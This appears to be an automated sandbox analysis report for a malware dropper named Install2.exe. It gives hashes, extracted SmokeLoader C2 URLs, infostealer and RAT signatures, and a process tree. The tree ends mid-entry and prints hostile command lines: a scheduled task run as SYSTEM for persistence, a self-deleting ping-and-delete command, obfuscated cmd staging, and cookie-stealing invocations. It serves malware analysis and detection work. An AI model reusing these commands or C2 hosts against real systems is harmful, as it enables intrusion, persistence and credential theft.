Resubmissions

08-07-2021 12:18

210708-8z6d5h8z2n 10

06-07-2021 17:53

210706-g6we6sa7sa 10

19-06-2021 18:17

210619-vr8bj2dzfn 10

17-06-2021 21:39

210617-a9cvlnmrbx 10

11-06-2021 17:26

210611-wvab1yw2tj 10

08-06-2021 06:47

210608-qrbpch3y46 10

08-06-2021 06:47

210608-64tndgm1ln 10

05-06-2021 18:40

210605-cd6qpr55sx 10

04-06-2021 11:56

210604-5c416rs3ns 10

04-06-2021 08:52

210604-jy9885jen2 10

Analysis

  • max time kernel
    1806s
  • max time network
    1735s
  • platform
    windows7_x64
  • resource
    win7v20210408
  • submitted
    06-05-2021 06:59

General

  • Target

    Install2.exe

  • Size

    497KB

  • MD5

    41a5f4fd1ea7cac4aa94a87aebccfef0

  • SHA1

    0d0abf079413a4c773754bf4fda338dc5b9a8ddc

  • SHA256

    97e95e99fd499ec45a7c1d8683d5731ce5e7a8fb8b710622e578cd169a00d8d9

  • SHA512

    5ca14bda498f26efff4e1179969b8f2c25244063c7bf25f3ec20b5cd24b5be320bbfb8b3d0b2d66f5c5b415da777a766fece5f251a4247773c6cb991417fb75f

Malware Config

Extracted

Family

smokeloader

Version

2020

C2

http://999080321newfolder1002002131-service1002.space/

http://999080321newfolder1002002231-service1002.space/

http://999080321newfolder3100231-service1002.space/

http://999080321newfolder1002002431-service1002.space/

http://999080321newfolder1002002531-service1002.space/

http://999080321newfolder33417-012425999080321.space/

http://999080321test125831-service10020125999080321.space/

http://999080321test136831-service10020125999080321.space/

http://999080321test147831-service10020125999080321.space/

http://999080321test146831-service10020125999080321.space/

http://999080321test134831-service10020125999080321.space/

http://999080321est213531-service1002012425999080321.ru/

http://999080321yes1t3481-service10020125999080321.ru/

http://999080321test13561-service10020125999080321.su/

http://999080321test14781-service10020125999080321.info/

http://999080321test13461-service10020125999080321.net/

http://999080321test15671-service10020125999080321.tech/

http://999080321test12671-service10020125999080321.online/

http://999080321utest1341-service10020125999080321.ru/

http://999080321uest71-service100201dom25999080321.ru/

rc4.i32
rc4.i32

Signatures

  • PlugX

    PlugX is a RAT (Remote Access Trojan) that has been around since 2008.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Blocklisted process makes network request 64 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 52 IoCs
  • Loads dropped DLL 64 IoCs
  • Reads local data of messenger clients 2 TTPs

    Infostealers often target stored data of messaging applications, which can include saved credentials and account information.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Checks for any installed AV software in registry 1 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Enumerates connected drives 3 TTPs 48 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Program crash 2 IoCs
  • Drops file in System32 directory 27 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 10 IoCs
  • Suspicious use of SetThreadContext 8 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 32 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks SCSI registry key(s) 3 TTPs 12 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 2 IoCs
  • Download via BitsAdmin 1 TTPs 1 IoCs
  • Kills process with taskkill 3 IoCs
  • Modifies Internet Explorer settings 1 TTPs 43 IoCs
  • Modifies data under HKEY_USERS 33 IoCs
  • Modifies registry class 34 IoCs
  • Modifies system certificate store 2 TTPs 14 IoCs
  • Runs ping.exe 1 TTPs 2 IoCs
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 10 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 5 IoCs
  • Suspicious behavior: MapViewOfSection 44 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 10 IoCs
  • Suspicious use of SendNotifyMessage 1 IoCs
  • Suspicious use of SetWindowsHookEx 18 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\services.exe
    C:\Windows\system32\services.exe
    1⤵
      PID:468
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k netsvcs
        2⤵
        • Suspicious use of NtCreateUserProcessOtherParentProcess
        • Drops file in System32 directory
        • Suspicious use of SetThreadContext
        • Drops file in Windows directory
        • Modifies registry class
        PID:872
        • C:\Windows\system32\taskeng.exe
          taskeng.exe {670FDB01-A30C-4961-B59E-5863D6EB93D8} S-1-5-18:NT AUTHORITY\System:Service:
          3⤵
          • Loads dropped DLL
          PID:2344
          • C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe
            "C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 115 -t 8080
            4⤵
            • Executes dropped EXE
            PID:2896
          • C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe
            "C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 113 -t 8080
            4⤵
            • Executes dropped EXE
            PID:964
          • C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe
            "C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 114 -t 8080
            4⤵
            • Executes dropped EXE
            PID:2720
          • C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe
            "C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 112 -t 8080
            4⤵
            • Executes dropped EXE
            PID:1608
          • C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe
            "C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 111 -t 8080
            4⤵
            • Executes dropped EXE
            PID:5296
          • C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe
            "C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 110 -t 8080
            4⤵
            • Executes dropped EXE
            PID:6968
        • C:\Windows\system32\taskeng.exe
          taskeng.exe {609B7319-FFF4-4364-88F2-C2D64081FA28} S-1-5-21-2455352368-1077083310-2879168483-1000:QWOCTUPM\Admin:Interactive:[1]
          3⤵
            PID:3016
            • C:\Users\Admin\AppData\Roaming\hibdiee
              C:\Users\Admin\AppData\Roaming\hibdiee
              4⤵
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              PID:2292
              • C:\Users\Admin\AppData\Roaming\hibdiee
                C:\Users\Admin\AppData\Roaming\hibdiee
                5⤵
                • Executes dropped EXE
                • Checks SCSI registry key(s)
                • Suspicious behavior: MapViewOfSection
                PID:2308
          • C:\Windows\system32\taskeng.exe
            taskeng.exe {F42392C1-9252-4A47-AEC4-9DCB589500F8} S-1-5-21-2455352368-1077083310-2879168483-1000:QWOCTUPM\Admin:Interactive:[1]
            3⤵
              PID:2328
              • C:\Users\Admin\AppData\Roaming\hibdiee
                C:\Users\Admin\AppData\Roaming\hibdiee
                4⤵
                • Executes dropped EXE
                • Suspicious use of SetThreadContext
                PID:8004
                • C:\Users\Admin\AppData\Roaming\hibdiee
                  C:\Users\Admin\AppData\Roaming\hibdiee
                  5⤵
                  • Executes dropped EXE
                  • Checks SCSI registry key(s)
                  • Suspicious behavior: MapViewOfSection
                  PID:1384
            • C:\Windows\system32\taskeng.exe
              taskeng.exe {17D52F68-C253-46BF-9344-AD0D364DFAED} S-1-5-21-2455352368-1077083310-2879168483-1000:QWOCTUPM\Admin:Interactive:[1]
              3⤵
                PID:8136
                • C:\Users\Admin\AppData\Roaming\hibdiee
                  C:\Users\Admin\AppData\Roaming\hibdiee
                  4⤵
                  • Executes dropped EXE
                  • Suspicious use of SetThreadContext
                  PID:2840
                  • C:\Users\Admin\AppData\Roaming\hibdiee
                    C:\Users\Admin\AppData\Roaming\hibdiee
                    5⤵
                    • Executes dropped EXE
                    • Checks SCSI registry key(s)
                    • Suspicious behavior: MapViewOfSection
                    PID:1976
            • C:\Windows\system32\msiexec.exe
              C:\Windows\system32\msiexec.exe /V
              2⤵
              • Enumerates connected drives
              • Drops file in Program Files directory
              • Drops file in Windows directory
              • Modifies data under HKEY_USERS
              • Modifies registry class
              • Suspicious use of AdjustPrivilegeToken
              PID:2484
              • C:\Windows\syswow64\MsiExec.exe
                C:\Windows\syswow64\MsiExec.exe -Embedding C1818503A1B6E9DED03274DB99A7F571 C
                3⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Suspicious behavior: CmdExeWriteProcessMemorySpam
                PID:2804
              • C:\Windows\syswow64\MsiExec.exe
                C:\Windows\syswow64\MsiExec.exe -Embedding 9624DFE1B1423846805CA4CEDCF85FE8
                3⤵
                  PID:2564
                  • C:\Windows\SysWOW64\taskkill.exe
                    "C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f
                    4⤵
                    • Kills process with taskkill
                    PID:2764
                • C:\Windows\syswow64\MsiExec.exe
                  C:\Windows\syswow64\MsiExec.exe -Embedding 2457EAC9AD4E5EA43849C081F12729D9 M Global\MSI0000
                  3⤵
                  • Loads dropped DLL
                  PID:3048
              • C:\Windows\system32\svchost.exe
                C:\Windows\system32\svchost.exe -k SystemNetworkService
                2⤵
                • Drops file in System32 directory
                • Checks processor information in registry
                • Modifies data under HKEY_USERS
                • Modifies registry class
                PID:3024
            • C:\Users\Admin\AppData\Local\Temp\Install2.exe
              "C:\Users\Admin\AppData\Local\Temp\Install2.exe"
              1⤵
              • Loads dropped DLL
              • Suspicious use of WriteProcessMemory
              PID:1820
              • C:\Users\Admin\AppData\Local\Temp\is-J94KO.tmp\Install2.tmp
                "C:\Users\Admin\AppData\Local\Temp\is-J94KO.tmp\Install2.tmp" /SL5="$9015C,235791,152064,C:\Users\Admin\AppData\Local\Temp\Install2.exe"
                2⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Suspicious use of WriteProcessMemory
                PID:2008
                • C:\Users\Admin\AppData\Local\Temp\is-3C092.tmp\Ultra.exe
                  "C:\Users\Admin\AppData\Local\Temp\is-3C092.tmp\Ultra.exe" /S /UID=burnerch1
                  3⤵
                  • Drops file in Drivers directory
                  • Executes dropped EXE
                  • Adds Run key to start application
                  • Drops file in Program Files directory
                  • Suspicious use of WriteProcessMemory
                  PID:1876
                  • C:\Program Files\Java\DCHOZCJYNE\ultramediaburner.exe
                    "C:\Program Files\Java\DCHOZCJYNE\ultramediaburner.exe" /VERYSILENT
                    4⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • Suspicious use of WriteProcessMemory
                    PID:1732
                    • C:\Users\Admin\AppData\Local\Temp\is-P6RS1.tmp\ultramediaburner.tmp
                      "C:\Users\Admin\AppData\Local\Temp\is-P6RS1.tmp\ultramediaburner.tmp" /SL5="$6012E,281924,62464,C:\Program Files\Java\DCHOZCJYNE\ultramediaburner.exe" /VERYSILENT
                      5⤵
                      • Executes dropped EXE
                      • Loads dropped DLL
                      • Drops file in Program Files directory
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of FindShellTrayWindow
                      • Suspicious use of WriteProcessMemory
                      PID:1084
                      • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                        "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                        6⤵
                        • Executes dropped EXE
                        PID:1376
                  • C:\Users\Admin\AppData\Local\Temp\d0-26286-b52-c6d9b-f4c9ea63b8cb0\Fijisafaqo.exe
                    "C:\Users\Admin\AppData\Local\Temp\d0-26286-b52-c6d9b-f4c9ea63b8cb0\Fijisafaqo.exe"
                    4⤵
                    • Executes dropped EXE
                    • Suspicious use of WriteProcessMemory
                    PID:1940
                    • C:\Program Files\Internet Explorer\iexplore.exe
                      "C:\Program Files\Internet Explorer\iexplore.exe" https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e6
                      5⤵
                      • Modifies Internet Explorer settings
                      • Suspicious behavior: GetForegroundWindowSpam
                      • Suspicious use of FindShellTrayWindow
                      • Suspicious use of SetWindowsHookEx
                      • Suspicious use of WriteProcessMemory
                      PID:1692
                      • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1692 CREDAT:275457 /prefetch:2
                        6⤵
                        • Modifies Internet Explorer settings
                        • Suspicious use of SetWindowsHookEx
                        PID:1144
                      • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1692 CREDAT:340994 /prefetch:2
                        6⤵
                        • Modifies Internet Explorer settings
                        • Suspicious use of SetWindowsHookEx
                        PID:2960
                        • C:\Windows\SysWOW64\WerFault.exe
                          C:\Windows\SysWOW64\WerFault.exe -u -p 2960 -s 1400
                          7⤵
                          • Program crash
                          • Suspicious behavior: GetForegroundWindowSpam
                          PID:1292
                      • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1692 CREDAT:668698 /prefetch:2
                        6⤵
                        • Modifies Internet Explorer settings
                        • Suspicious use of SetWindowsHookEx
                        PID:2624
                    • C:\Program Files\Internet Explorer\iexplore.exe
                      "C:\Program Files\Internet Explorer\iexplore.exe" https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad
                      5⤵
                        PID:1544
                    • C:\Users\Admin\AppData\Local\Temp\da-15810-a79-529bc-112fb4a6598c7\ZHikucykumae.exe
                      "C:\Users\Admin\AppData\Local\Temp\da-15810-a79-529bc-112fb4a6598c7\ZHikucykumae.exe"
                      4⤵
                      • Executes dropped EXE
                      • Modifies system certificate store
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      • Suspicious use of WriteProcessMemory
                      PID:2000
                      • C:\Windows\System32\cmd.exe
                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\n42jbfzm.nq5\KiffMainE1.exe & exit
                        5⤵
                        • Suspicious use of WriteProcessMemory
                        PID:2508
                        • C:\Users\Admin\AppData\Local\Temp\n42jbfzm.nq5\KiffMainE1.exe
                          C:\Users\Admin\AppData\Local\Temp\n42jbfzm.nq5\KiffMainE1.exe
                          6⤵
                          • Executes dropped EXE
                          • Suspicious use of WriteProcessMemory
                          PID:2668
                          • C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe
                            dw20.exe -x -s 532
                            7⤵
                            • Suspicious behavior: GetForegroundWindowSpam
                            PID:2824
                      • C:\Windows\System32\cmd.exe
                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ssciu1my.hoq\001.exe & exit
                        5⤵
                        • Suspicious use of WriteProcessMemory
                        PID:2736
                        • C:\Users\Admin\AppData\Local\Temp\ssciu1my.hoq\001.exe
                          C:\Users\Admin\AppData\Local\Temp\ssciu1my.hoq\001.exe
                          6⤵
                            PID:2804
                        • C:\Windows\System32\cmd.exe
                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\rzcvj05v.qe1\installer.exe /qn CAMPAIGN="654" & exit
                          5⤵
                          • Suspicious use of WriteProcessMemory
                          PID:3004
                          • C:\Users\Admin\AppData\Local\Temp\rzcvj05v.qe1\installer.exe
                            C:\Users\Admin\AppData\Local\Temp\rzcvj05v.qe1\installer.exe /qn CAMPAIGN="654"
                            6⤵
                            • Executes dropped EXE
                            • Loads dropped DLL
                            • Enumerates connected drives
                            • Modifies system certificate store
                            • Suspicious behavior: CmdExeWriteProcessMemorySpam
                            • Suspicious use of AdjustPrivilegeToken
                            • Suspicious use of FindShellTrayWindow
                            PID:1472
                            • C:\Windows\SysWOW64\msiexec.exe
                              "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Yonatan.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\rzcvj05v.qe1\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\rzcvj05v.qe1\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1620032487 /qn CAMPAIGN=""654"" " CAMPAIGN="654"
                              7⤵
                                PID:2164
                          • C:\Windows\System32\cmd.exe
                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\b4r3wnl4.ebv\google-game.exe & exit
                            5⤵
                              PID:2028
                              • C:\Users\Admin\AppData\Local\Temp\b4r3wnl4.ebv\google-game.exe
                                C:\Users\Admin\AppData\Local\Temp\b4r3wnl4.ebv\google-game.exe
                                6⤵
                                • Executes dropped EXE
                                • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                • Suspicious use of SetWindowsHookEx
                                PID:1812
                                • C:\Windows\SysWOW64\rundll32.exe
                                  "C:\Windows\System32\rundll32.exe" "C:\Users\Admin\AppData\Local\Temp\install.dll",install
                                  7⤵
                                    PID:2724
                              • C:\Windows\System32\cmd.exe
                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\pj2lksf2.n5v\huesaa.exe & exit
                                5⤵
                                  PID:2084
                                  • C:\Users\Admin\AppData\Local\Temp\pj2lksf2.n5v\huesaa.exe
                                    C:\Users\Admin\AppData\Local\Temp\pj2lksf2.n5v\huesaa.exe
                                    6⤵
                                    • Executes dropped EXE
                                    • Loads dropped DLL
                                    • Adds Run key to start application
                                    • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                    PID:2128
                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                      7⤵
                                      • Executes dropped EXE
                                      PID:2424
                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                      7⤵
                                      • Executes dropped EXE
                                      PID:2384
                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                      7⤵
                                      • Executes dropped EXE
                                      PID:1780
                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                      7⤵
                                      • Executes dropped EXE
                                      PID:2292
                                • C:\Windows\System32\cmd.exe
                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ihtdgbss.sr1\askinstall39.exe & exit
                                  5⤵
                                    PID:1288
                                    • C:\Users\Admin\AppData\Local\Temp\ihtdgbss.sr1\askinstall39.exe
                                      C:\Users\Admin\AppData\Local\Temp\ihtdgbss.sr1\askinstall39.exe
                                      6⤵
                                      • Executes dropped EXE
                                      • Modifies system certificate store
                                      • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                      PID:2460
                                      • C:\Windows\SysWOW64\cmd.exe
                                        cmd.exe /c taskkill /f /im chrome.exe
                                        7⤵
                                          PID:2920
                                          • C:\Windows\SysWOW64\taskkill.exe
                                            taskkill /f /im chrome.exe
                                            8⤵
                                            • Kills process with taskkill
                                            PID:964
                                    • C:\Windows\System32\cmd.exe
                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\fkrxulyl.dgh\setup.exe & exit
                                      5⤵
                                        PID:812
                                        • C:\Users\Admin\AppData\Local\Temp\fkrxulyl.dgh\setup.exe
                                          C:\Users\Admin\AppData\Local\Temp\fkrxulyl.dgh\setup.exe
                                          6⤵
                                          • Executes dropped EXE
                                          • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                          PID:2776
                                          • C:\Windows\SysWOW64\cmd.exe
                                            cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\fkrxulyl.dgh\setup.exe"
                                            7⤵
                                              PID:2924
                                              • C:\Windows\SysWOW64\PING.EXE
                                                ping 1.1.1.1 -n 1 -w 3000
                                                8⤵
                                                • Runs ping.exe
                                                PID:1380
                                        • C:\Windows\System32\cmd.exe
                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\3zsrc22x.uvj\Setup_v3.exe & exit
                                          5⤵
                                            PID:2104
                                            • C:\Users\Admin\AppData\Local\Temp\3zsrc22x.uvj\Setup_v3.exe
                                              C:\Users\Admin\AppData\Local\Temp\3zsrc22x.uvj\Setup_v3.exe
                                              6⤵
                                              • Executes dropped EXE
                                              • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                              PID:2212
                                              • C:\Windows\SysWOW64\at.exe
                                                "C:\Windows\System32\at.exe"
                                                7⤵
                                                  PID:2608
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  "C:\Windows\System32\cmd.exe" /c cfJhtziJSwbWaavQqftKBOzknThtiEQiDkdMlfkCNBTYvSLeKmkYzx & C:\Windows\System32\cmd.exe < Sta.vstm
                                                  7⤵
                                                    PID:2844
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      C:\Windows\System32\cmd.exe
                                                      8⤵
                                                      • Loads dropped DLL
                                                      PID:2888
                                                      • C:\Windows\SysWOW64\findstr.exe
                                                        findstr /V /R "^auPnRNysIHbguzrrqNSScEBqzRPPbdMbFoQYCAfsPGuHOxFbthGdjTOOFOtZYdTsVqJXDtAAbBePnTjYkaLlJckLzezNcd$" Poi.vstm
                                                        9⤵
                                                          PID:2944
                                                        • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Fessura.exe.com
                                                          Fessura.exe.com Z
                                                          9⤵
                                                          • Executes dropped EXE
                                                          • Loads dropped DLL
                                                          PID:2148
                                                          • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Fessura.exe.com
                                                            C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Fessura.exe.com Z
                                                            10⤵
                                                            • Executes dropped EXE
                                                            • Suspicious use of SetThreadContext
                                                            • Suspicious behavior: MapViewOfSection
                                                            PID:2532
                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                              schtasks.exe /create /tn "PjPVhJpbFf" /tr "C:\\Users\\Admin\\AppData\\Roaming\\cpyTzEXhxT\\PjPVhJpbFf.exe.com C:\\Users\\Admin\\AppData\\Roaming\\cpyTzEXhxT\\A" /sc onstart /F /RU SYSTEM
                                                              11⤵
                                                              • Creates scheduled task(s)
                                                              PID:1500
                                                            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\RegAsm.exe
                                                              C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\RegAsm.exe
                                                              11⤵
                                                              • Executes dropped EXE
                                                              PID:2684
                                                            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\RegAsm.exe
                                                              C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\RegAsm.exe
                                                              11⤵
                                                              • Executes dropped EXE
                                                              PID:8072
                                                            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\RegAsm.exe
                                                              C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\RegAsm.exe
                                                              11⤵
                                                              • Executes dropped EXE
                                                              PID:8128
                                                            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\RegAsm.exe
                                                              C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\RegAsm.exe
                                                              11⤵
                                                              • Executes dropped EXE
                                                              PID:7948
                                                        • C:\Windows\SysWOW64\PING.EXE
                                                          ping 127.0.0.1 -n 30
                                                          9⤵
                                                          • Runs ping.exe
                                                          PID:2420
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      cmd /c ""C:\Users\Admin\AppData\Local\Temp\7ZSfx000.cmd" "
                                                      7⤵
                                                        PID:7880
                                                  • C:\Windows\System32\cmd.exe
                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\zchygirs.nwp\toolspab1.exe & exit
                                                    5⤵
                                                      PID:2324
                                                      • C:\Users\Admin\AppData\Local\Temp\zchygirs.nwp\toolspab1.exe
                                                        C:\Users\Admin\AppData\Local\Temp\zchygirs.nwp\toolspab1.exe
                                                        6⤵
                                                        • Executes dropped EXE
                                                        • Loads dropped DLL
                                                        • Suspicious use of SetThreadContext
                                                        • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                        PID:1328
                                                        • C:\Users\Admin\AppData\Local\Temp\zchygirs.nwp\toolspab1.exe
                                                          C:\Users\Admin\AppData\Local\Temp\zchygirs.nwp\toolspab1.exe
                                                          7⤵
                                                          • Executes dropped EXE
                                                          • Loads dropped DLL
                                                          • Checks SCSI registry key(s)
                                                          • Suspicious behavior: MapViewOfSection
                                                          PID:2500
                                                    • C:\Windows\System32\cmd.exe
                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\wja0f3jn.tmz\005.exe & exit
                                                      5⤵
                                                        PID:952
                                                        • C:\Users\Admin\AppData\Local\Temp\wja0f3jn.tmz\005.exe
                                                          C:\Users\Admin\AppData\Local\Temp\wja0f3jn.tmz\005.exe
                                                          6⤵
                                                          • Executes dropped EXE
                                                          • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                          PID:2920
                                                      • C:\Windows\System32\cmd.exe
                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\lsaej0sr.pls\SunLabsPlayer.exe /S & exit
                                                        5⤵
                                                          PID:1508
                                                          • C:\Users\Admin\AppData\Local\Temp\lsaej0sr.pls\SunLabsPlayer.exe
                                                            C:\Users\Admin\AppData\Local\Temp\lsaej0sr.pls\SunLabsPlayer.exe /S
                                                            6⤵
                                                            • Executes dropped EXE
                                                            • Loads dropped DLL
                                                            • Drops file in Program Files directory
                                                            • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                            PID:1544
                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst14BB.tmp\tempfile.ps1"
                                                              7⤵
                                                                PID:1592
                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst14BB.tmp\tempfile.ps1"
                                                                7⤵
                                                                  PID:8176
                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst14BB.tmp\tempfile.ps1"
                                                                  7⤵
                                                                  • Drops file in Program Files directory
                                                                  PID:7908
                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst14BB.tmp\tempfile.ps1"
                                                                  7⤵
                                                                  • Blocklisted process makes network request
                                                                  • Loads dropped DLL
                                                                  • Drops file in Program Files directory
                                                                  PID:2564
                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst14BB.tmp\tempfile.ps1"
                                                                  7⤵
                                                                    PID:2840
                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst14BB.tmp\tempfile.ps1"
                                                                    7⤵
                                                                      PID:8048
                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst14BB.tmp\tempfile.ps1"
                                                                      7⤵
                                                                      • Checks for any installed AV software in registry
                                                                      PID:6944
                                                                    • C:\Windows\SysWOW64\bitsadmin.exe
